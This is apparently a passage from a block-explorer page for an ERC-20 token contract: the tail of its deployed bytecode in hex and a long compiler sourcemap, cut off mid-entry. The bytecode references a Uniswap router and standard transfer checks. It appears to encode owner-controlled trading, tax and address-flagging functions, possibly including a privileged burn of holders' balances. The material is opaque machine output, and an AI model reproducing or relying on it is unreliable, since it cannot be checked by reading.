166000818152602081815260408083208686039055600280548790039055518581529192917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a3505050565b6001600160a01b0383166117885760405162461bcd60e51b8152600401610ba190611dea565b6001600160a01b0382166117ae5760405162461bcd60e51b8152600401610ba190611e2f565b6001600160a01b038316600090815260208190526040902054818110156118265760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610ba1565b6001600160a01b03848116600081815260208181526040808320878703905593871680835291849020805487019055925185815290927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a3610fe6565b61189530610bc1565b60000361189e57565b6000806118aa30610bc1565b60065490915047906000906118c7906001600160a01b0316610bc1565b90506000600f5484111561192d574792506118e3846000611934565b6118ed8347611dd7565b9450600f548211156119155780611905576000611907565b845b6119119086611e89565b6016555b84601660008282546119279190611d8e565b90915550505b5050505050565b604080516002808252606082018352600092602083019080368337019050509050308160008151811061196957611969611eab565b60200260200101906001600160a01b031690816001600160a01b0316815250507f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156119e7573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611a0b9190611d2d565b81600181518110611a1e57611a1e611eab565b6001600160a01b03928316602091820292909201015260405163095ea7b360e01b81527f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d90911660048201526000196024820152309063095ea7b3906044016020604051808303816000875af1158015611a9c573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611ac09190611dba565b5060405163791ac94760e01b81526001600160a01b037f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d169063791ac94790611b159086908690869030904290600401611ec1565b600060405180830381600087803b158015611b2f57600080fd5b505af1158015611b43573d6000803e3d6000fd5b50505050505050565b600060208083528351808285015260005b81811015611b7957858101830151858201604001528201611b5d565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b0381168114610d1d57600080fd5b60008060408385031215611bc257600080fd5b8235611bcd81611b9a565b946020939093013593505050565b600080600060608486031215611bf057600080fd5b8335611bfb81611b9a565b92506020840135611c0b81611b9a565b929592945050506040919091013590565b600060208284031215611c2e57600080fd5b8135611c3981611b9a565b9392505050565b60008060408385031215611c5357600080fd5b8235611c5e81611b9a565b91506020830135611c6e81611b9a565b809150509250929050565b8015158114610d1d57600080fd5b60008060408385031215611c9a57600080fd5b8235611ca581611b9a565b91506020830135611c6e81611c79565b634e487b7160e01b600052602160045260246000fd5b6020810160048310611ced57634e487b7160e01b600052602160045260246000fd5b91905290565b600181811c90821680611d0757607f821691505b602082108103611d2757634e487b7160e01b600052602260045260246000fd5b50919050565b600060208284031215611d3f57600080fd5b8151611c3981611b9a565b600080600060608486031215611d5f57600080fd5b8351925060208401519150604084015190509250925092565b634e487b7160e01b600052601160045260246000fd5b8082018082111561070457610704611d78565b600060208284031215611db357600080fd5b5051919050565b600060208284031215611dcc57600080fd5b8151611c3981611c79565b8181038181111561070457610704611d78565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b808202811582820484141761070457610704611d78565b600082611ea657634e487b7160e01b600052601260045260246000fd5b500490565b634e487b7160e01b600052603260045260246000fd5b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b81811015611f115784516001600160a01b031683529383019391830191600101611eec565b50506001600160a01b0396909616606085015250505060800152939250505056fea264697066735822122007b141982c94a0195ff42d0e5adb3493100d5f58727654843c44dd0de365ca2d64736f6c63430008130033

Deployed Bytecode Sourcemap

26764:8020:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;26901:64;;;;;;;;;;-1:-1:-1;26901:64:0;;;;-1:-1:-1;;;;;26901:64:0;;;;;;-1:-1:-1;;;;;178:32:1;;;160:51;;148:2;133:18;26901:64:0;;;;;;;;27305:50;;;;;;;;;;;;;;;;;;;368:25:1;;;356:2;341:18;27305:50:0;222:177:1;14981:100:0;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;17341:201::-;;;;;;;;;;-1:-1:-1;17341:201:0;;;;;:::i;:::-;;:::i;:::-;;;1578:14:1;;1571:22;1553:41;;1541:2;1526:18;17341:201:0;1413:187:1;27481:51:0;;;;;;;;;;;;;;;16110:108;;;;;;;;;;-1:-1:-1;16198:12:0;;16110:108;;29661:479;;;:::i;:::-;;18122:261;;;;;;;;;;-1:-1:-1;18122:261:0;;;;;:::i;:::-;;:::i;27019:34::-;;;;;;;;;;-1:-1:-1;27019:34:0;;;;;:::i;:::-;;;;;;;;;;;;;;;;15952:93;;;;;;;;;;-1:-1:-1;15952:93:0;;16035:2;2694:36:1;;2682:2;2667:18;15952:93:0;2552:184:1;27402:32:0;;;;;;;;;;;;;;;;18792:238;;;;;;;;;;-1:-1:-1;18792:238:0;;;;;:::i;:::-;;:::i;27364:31::-;;;;;;;;;;;;;;;;27539:28;;;;;;;;;;-1:-1:-1;27539:28:0;;;;-1:-1:-1;;;;;27539:28:0;;;34404:185;;;;;;;;;;-1:-1:-1;34404:185:0;;;;;:::i;:::-;;:::i;29498:155::-;;;;;;;;;;;;;:::i;30298:176::-;;;;;;;;;;;;;:::i;16281:127::-;;;;;;;;;;-1:-1:-1;16281:127:0;;;;;:::i;:::-;;:::i;3306:103::-;;;;;;;;;;;;;:::i;34286:110::-;;;;;;;;;;;;;:::i;27060:50::-;;;;;;;;;;-1:-1:-1;27060:50:0;;;;;:::i;:::-;;;;;;;;;;;;;;;;27187:52;;;;;;;;;;;;;;;;2443:87;;;;;;;;;;-1:-1:-1;2516:6:0;;-1:-1:-1;;;;;2516:6:0;2443:87;;15200:104;;;;;;;;;;;;;:::i;34597:184::-;;;;;;;;;;;;;:::i;19533:436::-;;;;;;;;;;-1:-1:-1;19533:436:0;;;;;:::i;:::-;;:::i;16614:193::-;;;;;;;;;;-1:-1:-1;16614:193:0;;;;;:::i;:::-;;:::i;27246:52::-;;;;;;;;;;;;;;;;27872:30;;;;;;;;;;;;;;;;30152:138;;;;;;;;;;-1:-1:-1;30152:138:0;;;;;:::i;:::-;;:::i;16870:151::-;;;;;;;;;;-1:-1:-1;16870:151:0;;;;;:::i;:::-;;:::i;26974:38::-;;;;;;;;;;-1:-1:-1;26974:38:0;;;;;:::i;:::-;;;;;;;;;;;;;;;;34128:113;;;;;;;;;;-1:-1:-1;34128:113:0;;;;;:::i;:::-;;:::i;3564:201::-;;;;;;;;;;-1:-1:-1;3564:201:0;;;;;:::i;:::-;;:::i;27625:25::-;;;;;;;;;;-1:-1:-1;27625:25:0;;;;-1:-1:-1;;;27625:25:0;;;;;;;;;;;;;:::i;14981:100::-;15035:13;15068:5;15061:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14981:100;:::o;17341:201::-;17424:4;984:10;17480:32;984:10;17496:7;17505:6;17480:8;:32::i;:::-;17530:4;17523:11;;;17341:201;;;;;:::o;29661:479::-;2251:13;:11;:13::i;:::-;29753:15:::1;-1:-1:-1::0;;;;;29753:23:0::1;;:25;;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;;;;;29735:55:0::1;;29799:4;29806:15;-1:-1:-1::0;;;;;29806:20:0::1;;:22;;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;29735:94;::::0;-1:-1:-1;;;;;;29735:94:0::1;::::0;;;;;;-1:-1:-1;;;;;4990:15:1;;;29735:94:0::1;::::0;::::1;4972:34:1::0;5042:15;;5022:18;;;5015:43;4907:18;;29735:94:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;29719:13;:110:::0;;-1:-1:-1;;;;;;29719:110:0::1;-1:-1:-1::0;;;;;29719:110:0;;;::::1;::::0;;;::::1;::::0;;29840:68:::1;29857:4;29872:15;-1:-1:-1::0;;29840:8:0::1;:68::i;:::-;29919:15;-1:-1:-1::0;;;;;29919:31:0::1;;29958:9;29991:4;30011:24;30029:4;30011:9;:24::i;:::-;30050:1;30067::::0;30084:7:::1;2516:6:::0;;-1:-1:-1;;;;;2516:6:0;;2443:87;30084:7:::1;29919:213;::::0;::::1;::::0;;;-1:-1:-1;;;;;;29919:213:0;;;-1:-1:-1;;;;;5428:15:1;;;29919:213:0::1;::::0;::::1;5410:34:1::0;5460:18;;;5453:34;;;;5503:18;;;5496:34;;;;5546:18;;;5539:34;5610:15;;;5589:19;;;5582:44;30106:15:0::1;5642:19:1::0;;;5635:35;5344:19;;29919:213:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;29661:479::o:0;18122:261::-;18219:4;984:10;18277:38;18293:4;984:10;18308:6;18277:15;:38::i;:::-;18326:27;18336:4;18342:2;18346:6;18326:9;:27::i;:::-;-1:-1:-1;18371:4:0;;18122:261;-1:-1:-1;;;;18122:261:0:o;18792:238::-;18880:4;984:10;18936:64;984:10;18952:7;18989:10;18961:25;984:10;18952:7;18961:9;:25::i;:::-;:38;;;;:::i;:::-;18936:8;:64::i;34404:185::-;2251:13;:11;:13::i;:::-;34510:7:::1;::::0;34532:38:::1;::::0;-1:-1:-1;;;34532:38:0;;34564:4:::1;34532:38;::::0;::::1;160:51:1::0;-1:-1:-1;;;;;34473:22:0;;::::1;::::0;::::1;::::0;34510:7;::::1;::::0;34473:22;;34532:23:::1;::::0;133:18:1;;34532:38:0::1;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;34473:108;::::0;-1:-1:-1;;;;;;34473:108:0::1;::::0;;;;;;-1:-1:-1;;;;;6635:32:1;;;34473:108:0::1;::::0;::::1;6617:51:1::0;6684:18;;;6677:34;6590:18;;34473:108:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;34404:185:::0;:::o;29498:155::-;29559:7;;29577:15;;29551:42;;29534:4;;-1:-1:-1;;;;;29559:7:0;;29551:42;;;;;29534:4;29551:42;29534:4;29551:42;29577:15;29559:7;29551:42;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;29622:1:0;29604:15;:19;29641:4;;29498:155::o;30298:176::-;2251:13;:11;:13::i;:::-;30359:14:::1;::::0;-1:-1:-1;;;30359:14:0;::::1;;;30358:15;30350:54;;;::::0;-1:-1:-1;;;30350:54:0;;7174:2:1;30350:54:0::1;::::0;::::1;7156:21:1::0;7213:2;7193:18;;;7186:30;7252:28;7232:18;;;7225:56;7298:18;;30350:54:0::1;;;;;;;;;30415:14;:21:::0;;-1:-1:-1;;;;30447:19:0;-1:-1:-1;;;30447:19:0;;;30298:176::o;16281:127::-;-1:-1:-1;;;;;16382:18:0;16355:7;16382:18;;;;;;;;;;;;16281:127::o;3306:103::-;2251:13;:11;:13::i;:::-;3371:30:::1;3398:1;3371:18;:30::i;:::-;3306:103::o:0;34286:110::-;2251:13;:11;:13::i;:::-;27161:19:::1;34340:11;:21:::0;;;34363:15:::1;:25:::0;34286:110::o;15200:104::-;15256:13;15289:7;15282:14;;;;;:::i;34597:184::-;34650:4;2251:13;:11;:13::i;:::-;-1:-1:-1;34667:12:0::1;:27:::0;;-1:-1:-1;;;;34667:27:0::1;-1:-1:-1::0;;;34667:27:0::1;::::0;;-1:-1:-1;34705:12:0::1;:16:::0;;;34732:13:::1;:17:::0;-1:-1:-1;;34597:184:0:o;19533:436::-;19626:4;984:10;19626:4;19709:25;984:10;19726:7;19709:9;:25::i;:::-;19682:52;;19773:15;19753:16;:35;;19745:85;;;;-1:-1:-1;;;19745:85:0;;7529:2:1;19745:85:0;;;7511:21:1;7568:2;7548:18;;;7541:30;7607:34;7587:18;;;7580:62;-1:-1:-1;;;7658:18:1;;;7651:35;7703:19;;19745:85:0;7327:401:1;19745:85:0;19866:60;19875:5;19882:7;19910:15;19891:16;:34;19866:8;:60::i;16614:193::-;16693:4;984:10;16749:28;984:10;16766:2;16770:6;16749:9;:28::i;30152:138::-;2324:16;:14;:16::i;:::-;-1:-1:-1;;;;;30225:8:0;::::1;30236:5;30225:8:::0;;;:2:::1;:8;::::0;;;;:16;;-1:-1:-1;;30225:16:0::1;::::0;;30273:8:::1;::::0;30243:39:::1;::::0;30228:4;;30255:15:::1;30228:4:::0;30255:9:::1;:15::i;:::-;:26;;;;:::i;:::-;30243:5;:39::i;:::-;30152:138:::0;:::o;16870:151::-;-1:-1:-1;;;;;16986:18:0;;;16959:7;16986:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;16870:151::o;34128:113::-;2251:13;:11;:13::i;:::-;-1:-1:-1;;;;;34215:8:0;;;::::1;;::::0;;;:2:::1;:8;::::0;;;;:18;;-1:-1:-1;;34215:18:0::1;::::0;::::1;;::::0;;;::::1;::::0;;34128:113::o;3564:201::-;2251:13;:11;:13::i;:::-;-1:-1:-1;;;;;3653:22:0;::::1;3645:73;;;::::0;-1:-1:-1;;;3645:73:0;;8068:2:1;3645:73:0::1;::::0;::::1;8050:21:1::0;8107:2;8087:18;;;8080:30;8146:34;8126:18;;;8119:62;-1:-1:-1;;;8197:18:1;;;8190:36;8243:19;;3645:73:0::1;7866:402:1::0;3645:73:0::1;3729:28;3748:8;3729:18;:28::i;23526:346::-:0;-1:-1:-1;;;;;23628:19:0;;23620:68;;;;-1:-1:-1;;;23620:68:0;;8475:2:1;23620:68:0;;;8457:21:1;8514:2;8494:18;;;8487:30;8553:34;8533:18;;;8526:62;-1:-1:-1;;;8604:18:1;;;8597:34;8648:19;;23620:68:0;8273:400:1;23620:68:0;-1:-1:-1;;;;;23707:21:0;;23699:68;;;;-1:-1:-1;;;23699:68:0;;8880:2:1;23699:68:0;;;8862:21:1;8919:2;8899:18;;;8892:30;8958:34;8938:18;;;8931:62;-1:-1:-1;;;9009:18:1;;;9002:32;9051:19;;23699:68:0;8678:398:1;23699:68:0;-1:-1:-1;;;;;23780:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;23832:32;;368:25:1;;;23832:32:0;;341:18:1;23832:32:0;;;;;;;23526:346;;;:::o;2608:132::-;2516:6;;-1:-1:-1;;;;;2516:6:0;984:10;2672:23;2664:68;;;;-1:-1:-1;;;2664:68:0;;9283:2:1;2664:68:0;;;9265:21:1;;;9302:18;;;9295:30;9361:34;9341:18;;;9334:62;9413:18;;2664:68:0;9081:356:1;24163:419:0;24264:24;24291:25;24301:5;24308:7;24291:9;:25::i;:::-;24264:52;;-1:-1:-1;;24331:16:0;:37;24327:248;;24413:6;24393:16;:26;;24385:68;;;;-1:-1:-1;;;24385:68:0;;9644:2:1;24385:68:0;;;9626:21:1;9683:2;9663:18;;;9656:30;9722:31;9702:18;;;9695:59;9771:18;;24385:68:0;9442:353:1;24385:68:0;24497:51;24506:5;24513:7;24541:6;24522:16;:25;24497:8;:51::i;:::-;24253:329;24163:419;;;:::o;30482:2861::-;-1:-1:-1;;;;;30616:18:0;;30608:68;;;;-1:-1:-1;;;30608:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;30695:16:0;;30687:64;;;;-1:-1:-1;;;30687:64:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;30767:12:0;;;;;;:6;:12;;;;;;;;30766:13;:28;;;;-1:-1:-1;;;;;;30784:10:0;;;;;;:6;:10;;;;;;;;30783:11;30766:28;30762:107;;;30819:14;;-1:-1:-1;;;30819:14:0;;;;30811:46;;;;-1:-1:-1;;;30811:46:0;;10812:2:1;30811:46:0;;;10794:21:1;10851:2;10831:18;;;10824:30;-1:-1:-1;;;10870:18:1;;;10863:49;10929:18;;30811:46:0;10610:343:1;30811:46:0;-1:-1:-1;;;;;30886:8:0;;;;;;:2;:8;;;;;;;;30885:9;:20;;;;-1:-1:-1;;;;;;30899:6:0;;;;;;:2;:6;;;;;;;;30898:7;30885:20;30881:398;;;30933:13;;-1:-1:-1;;;;;30927:19:0;;;30933:13;;30927:19;30923:345;;30985:11;;30975:6;:21;;30967:95;;;;-1:-1:-1;;;30967:95:0;;11160:2:1;30967:95:0;;;11142:21:1;11199:2;11179:18;;;11172:30;11238:34;11218:18;;;11211:62;11309:31;11289:18;;;11282:59;11358:19;;30967:95:0;10958:425:1;30967:95:0;31139:15;;31121:13;31131:2;31121:9;:13::i;:::-;31112:22;;:6;:22;:::i;:::-;31111:43;;31081:171;;;;-1:-1:-1;;;31081:171:0;;11590:2:1;31081:171:0;;;11572:21:1;11629:2;11609:18;;;11602:30;11668:34;11648:18;;;11641:62;-1:-1:-1;;;11719:18:1;;;11712:52;11781:19;;31081:171:0;11388:418:1;31081:171:0;-1:-1:-1;;;;;31338:12:0;;31291:22;31338:12;;;:6;:12;;;;;;31316:6;;31338:12;;31337:13;:28;;;;-1:-1:-1;;;;;;31355:10:0;;;;;;:6;:10;;;;;;;;31354:11;31337:28;31333:1951;;;31395:13;;-1:-1:-1;;;;;31387:21:0;;;31395:13;;31387:21;;:44;;-1:-1:-1;31418:13:0;;-1:-1:-1;;;;;31412:19:0;;;31418:13;;31412:19;31387:44;31382:1891;;;31471:11;;31461:6;:21;;31453:91;;;;-1:-1:-1;;;31453:91:0;;12013:2:1;31453:91:0;;;11995:21:1;12052:2;12032:18;;;12025:30;12091:34;12071:18;;;12064:62;12162:27;12142:18;;;12135:55;12207:19;;31453:91:0;11811:421:1;31453:91:0;31592:13;;-1:-1:-1;;;;;31592:21:0;;;:13;;:21;:53;;;;-1:-1:-1;;;;;;31639:6:0;;;;;;:2;:6;;;;;;;;31638:7;31592:53;:99;;;;-1:-1:-1;;;;;;31670:21:0;;31686:4;31670:21;;31592:99;31566:505;;;31756:12;31740;;-1:-1:-1;;;31740:12:0;;;;:28;;;;;;;;:::i;:::-;;31736:114;;-1:-1:-1;;;;;31797:22:0;;;;;;:18;:22;;;;;:29;;-1:-1:-1;;31797:29:0;31822:4;31797:29;;;31736:114;31874:17;31920:3;31904:12;;31895:6;:21;;;;:::i;:::-;31894:29;;;;:::i;:::-;31874:49;;31946:47;31962:4;31976;31983:9;31946:15;:47::i;:::-;32033:18;32042:9;32033:6;:18;:::i;:::-;32016:35;;31711:360;31566:505;32117:13;;-1:-1:-1;;;;;32117:19:0;;;:13;;:19;:53;;;;-1:-1:-1;;;;;;32162:8:0;;;;;;:2;:8;;;;;;;;32161:9;32117:53;:97;;;;-1:-1:-1;;;;;;32195:19:0;;32209:4;32195:19;;32117:97;:134;;;;-1:-1:-1;32239:12:0;;-1:-1:-1;;;32239:12:0;;;;32117:134;:174;;;;-1:-1:-1;32278:13:0;;-1:-1:-1;;;32278:13:0;;;;32277:14;32117:174;32091:773;;;32374:13;;-1:-1:-1;;;;;32414:24:0;;32356:15;32414:24;;;:18;:24;;;;;;;;:32;;:24;:32;32410:110;;-1:-1:-1;32485:11:0;;32410:110;32544:13;:20;;-1:-1:-1;;;;32544:20:0;-1:-1:-1;;;32544:20:0;;;32587:16;:14;:16::i;:::-;32626:13;:21;;-1:-1:-1;;;;32626:21:0;;;32642:5;32713:3;32693:16;32702:7;32693:6;:16;:::i;:::-;32692:24;;;;:::i;:::-;32672:44;;32739:47;32755:4;32769;32776:9;32739:15;:47::i;:::-;32826:18;32835:9;32826:6;:18;:::i;:::-;32809:35;;32311:553;;32091:773;31382:1891;;;-1:-1:-1;;;;;32943:24:0;;;;;;:18;:24;;;;;;;;:32;;:24;:32;:76;;;;-1:-1:-1;33000:13:0;;-1:-1:-1;;;;;33000:19:0;;;:13;;:19;;32943:76;32917:341;;;33062:17;33107:3;33092:11;;33083:6;:20;;;;:::i;:::-;33082:28;;;;:::i;:::-;33062:48;;33133:47;33149:4;33163;33170:9;33133:15;:47::i;:::-;33220:18;33229:9;33220:6;:18;:::i;:::-;33203:35;;33039:219;32917:341;33294:41;33310:4;33316:2;33320:14;33294:15;:41::i;3925:191::-;4018:6;;;-1:-1:-1;;;;;4035:17:0;;;-1:-1:-1;;;;;;4035:17:0;;;;;;;4068:40;;4018:6;;;4035:17;4018:6;;4068:40;;3999:16;;4068:40;3988:128;3925:191;:::o;2748:138::-;2831:7;;-1:-1:-1;;;;;2831:7:0;984:10;-1:-1:-1;;;;;2815:23:0;;2807:71;;;;-1:-1:-1;;;2807:71:0;;12834:2:1;2807:71:0;;;12816:21:1;12873:2;12853:18;;;12846:30;12912:34;12892:18;;;12885:62;-1:-1:-1;;;12963:18:1;;;12956:33;13006:19;;2807:71:0;12632:399:1;22413:675:0;-1:-1:-1;;;;;22497:21:0;;22489:67;;;;-1:-1:-1;;;22489:67:0;;13238:2:1;22489:67:0;;;13220:21:1;13277:2;13257:18;;;13250:30;13316:34;13296:18;;;13289:62;-1:-1:-1;;;13367:18:1;;;13360:31;13408:19;;22489:67:0;13036:397:1;22489:67:0;-1:-1:-1;;;;;22656:18:0;;22631:22;22656:18;;;;;;;;;;;22693:24;;;;22685:71;;;;-1:-1:-1;;;22685:71:0;;13640:2:1;22685:71:0;;;13622:21:1;13679:2;13659:18;;;13652:30;13718:34;13698:18;;;13691:62;-1:-1:-1;;;13769:18:1;;;13762:32;13811:19;;22685:71:0;13438:398:1;22685:71:0;-1:-1:-1;;;;;22792:18:0;;:9;:18;;;;;;;;;;;22813:23;;;22792:44;;22931:12;:22;;;;;;;22982:37;368:25:1;;;22792:9:0;;:18;22982:37;;341:18:1;22982:37:0;;;;;;;29919:213:::1;;;29661:479::o:0;20439:806::-;-1:-1:-1;;;;;20536:18:0;;20528:68;;;;-1:-1:-1;;;20528:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;20615:16:0;;20607:64;;;;-1:-1:-1;;;20607:64:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;20757:15:0;;20735:19;20757:15;;;;;;;;;;;20791:21;;;;20783:72;;;;-1:-1:-1;;;20783:72:0;;14043:2:1;20783:72:0;;;14025:21:1;14082:2;14062:18;;;14055:30;14121:34;14101:18;;;14094:62;-1:-1:-1;;;14172:18:1;;;14165:36;14218:19;;20783:72:0;13841:402:1;20783:72:0;-1:-1:-1;;;;;20891:15:0;;;:9;:15;;;;;;;;;;;20909:20;;;20891:38;;21109:13;;;;;;;;;;:23;;;;;;21161:26;;368:25:1;;;21109:13:0;;21161:26;;341:18:1;21161:26:0;;;;;;;21200:37;29661:479;28645:844;28695:24;28713:4;28695:9;:24::i;:::-;28723:1;28695:29;28691:68;;28645:844::o;28691:68::-;28769:19;28814:28;28845:24;28863:4;28845:9;:24::i;:::-;28975:7;;28814:55;;-1:-1:-1;28908:21:0;;28884;;28965:18;;-1:-1:-1;;;;;28975:7:0;28965:9;:18::i;:::-;28944:39;;28998:12;29052:13;;29029:20;:36;29025:446;;;29102:21;29086:37;;29142:42;29160:20;29182:1;29142:17;:42::i;:::-;29217:37;29241:13;29217:21;:37;:::i;:::-;29203:51;;29290:13;;29277:10;:26;29273:134;;;29361:7;:25;;29385:1;29361:25;;;29371:11;29361:25;29346:41;;:11;:41;:::i;:::-;29328:15;:59;29273:134;29444:11;29425:15;;:30;;;;;;;:::i;:::-;;;;-1:-1:-1;;29025:446:0;28799:683;;;;28680:809;28645:844::o;33532:588::-;33673:16;;;33687:1;33673:16;;;;;;;;33649:21;;33673:16;;;;;;;;;;-1:-1:-1;33673:16:0;33649:40;;33718:4;33700;33705:1;33700:7;;;;;;;;:::i;:::-;;;;;;:23;-1:-1:-1;;;;;33700:23:0;;;-1:-1:-1;;;;;33700:23:0;;;;;33744:15;-1:-1:-1;;;;;33744:20:0;;:22;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;33734:4;33739:1;33734:7;;;;;;;;:::i;:::-;-1:-1:-1;;;;;33734:32:0;;;:7;;;;;;;;;:32;33779:111;;-1:-1:-1;;;33779:111:0;;33831:15;6635:32:1;;;33779:111:0;;;6617:51:1;-1:-1:-1;;6684:18:1;;;6677:34;33794:4:0;;33779:29;;6590:18:1;;33779:111:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1;33903:209:0;;-1:-1:-1;;;33903:209:0;;-1:-1:-1;;;;;33903:15:0;:66;;;;:209;;33984:11;;34010:14;;34039:4;;34066;;34086:15;;33903:209;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;33638:482;33532:588;;:::o;404:548:1:-;516:4;545:2;574;563:9;556:21;606:6;600:13;649:6;644:2;633:9;629:18;622:34;674:1;684:140;698:6;695:1;692:13;684:140;;;793:14;;;789:23;;783:30;759:17;;;778:2;755:26;748:66;713:10;;684:140;;;688:3;873:1;868:2;859:6;848:9;844:22;840:31;833:42;943:2;936;932:7;927:2;919:6;915:15;911:29;900:9;896:45;892:54;884:62;;;;404:548;;;;:::o;957:131::-;-1:-1:-1;;;;;1032:31:1;;1022:42;;1012:70;;1078:1;1075;1068:12;1093:315;1161:6;1169;1222:2;1210:9;1201:7;1197:23;1193:32;1190:52;;;1238:1;1235;1228:12;1190:52;1277:9;1264:23;1296:31;1321:5;1296:31;:::i;:::-;1346:5;1398:2;1383:18;;;;1370:32;;-1:-1:-1;;;1093:315:1:o;1839:456::-;1916:6;1924;1932;1985:2;1973:9;1964:7;1960:23;1956:32;1953:52;;;2001:1;1998;1991:12;1953:52;2040:9;2027:23;2059:31;2084:5;2059:31;:::i;:::-;2109:5;-1:-1:-1;2166:2:1;2151:18;;2138:32;2179:33;2138:32;2179:33;:::i;:::-;1839:456;;2231:7;;-1:-1:-1;;;2285:2:1;2270:18;;;;2257:32;;1839:456::o;2300:247::-;2359:6;2412:2;2400:9;2391:7;2387:23;2383:32;2380:52;;;2428:1;2425;2418:12;2380:52;2467:9;2454:23;2486:31;2511:5;2486:31;:::i;:::-;2536:5;2300:247;-1:-1:-1;;;2300:247:1:o;2741:388::-;2809:6;2817;2870:2;2858:9;2849:7;2845:23;2841:32;2838:52;;;2886:1;2883;2876:12;2838:52;2925:9;2912:23;2944:31;2969:5;2944:31;:::i;:::-;2994:5;-1:-1:-1;3051:2:1;3036:18;;3023:32;3064:33;3023:32;3064:33;:::i;:::-;3116:7;3106:17;;;2741:388;;;;;:::o;3134:118::-;3220:5;3213:13;3206:21;3199:5;3196:32;3186:60;;3242:1;3239;3232:12;3257:382;3322:6;3330;3383:2;3371:9;3362:7;3358:23;3354:32;3351:52;;;3399:1;3396;3389:12;3351:52;3438:9;3425:23;3457:31;3482:5;3457:31;:::i;:::-;3507:5;-1:-1:-1;3564:2:1;3549:18;;3536:32;3577:30;3536:32;3577:30;:::i;3644:127::-;3705:10;3700:3;3696:20;3693:1;3686:31;3736:4;3733:1;3726:15;3760:4;3757:1;3750:15;3776:338;3918:2;3903:18;;3951:1;3940:13;;3930:144;;3996:10;3991:3;3987:20;3984:1;3977:31;4031:4;4028:1;4021:15;4059:4;4056:1;4049:15;3930:144;4083:25;;;3776:338;:::o;4119:380::-;4198:1;4194:12;;;;4241;;;4262:61;;4316:4;4308:6;4304:17;4294:27;;4262:61;4369:2;4361:6;4358:14;4338:18;4335:38;4332:161;;4415:10;4410:3;4406:20;4403:1;4396:31;4450:4;4447:1;4440:15;4478:4;4475:1;4468:15;4332:161;;4119:380;;;:::o;4504:251::-;4574:6;4627:2;4615:9;4606:7;4602:23;4598:32;4595:52;;;4643:1;4640;4633:12;4595:52;4675:9;4669:16;4694:31;4719:5;4694:31;:::i;5681:306::-;5769:6;5777;5785;5838:2;5826:9;5817:7;5813:23;5809:32;5806:52;;;5854:1;5851;5844:12;5806:52;5883:9;5877:16;5867:26;;5933:2;5922:9;5918:18;5912:25;5902:35;;5977:2;5966:9;5962:18;5956:25;5946:35;;5681:306;;;;;:::o;5992:127::-;6053:10;6048:3;6044:20;6041:1;6034:31;6084:4;6081:1;6074:15;6108:4;6105:1;6098:15;6124:125;6189:9;;;6210:10;;;6207:36;;;6223:18;;:::i;6254:184::-;6324:6;6377:2;6365:9;6356:7;6352:23;6348:32;6345:52;;;6393:1;6390;6383:12;6345:52;-1:-1:-1;6416:16:1;;6254:184;-1:-1:-1;6254:184:1:o;6722:245::-;6789:6;6842:2;6830:9;6821:7;6817:23;6813:32;6810:52;;;6858:1;6855;6848:12;6810:52;6890:9;6884:16;6909:28;6931:5;6909:28;:::i;7733:128::-;7800:9;;;7821:11;;;7818:37;;;7835:18;;:::i;9800:401::-;10002:2;9984:21;;;10041:2;10021:18;;;10014:30;10080:34;10075:2;10060:18;;10053:62;-1:-1:-1;;;10146:2:1;10131:18;;10124:35;10191:3;10176:19;;9800:401::o;10206:399::-;1040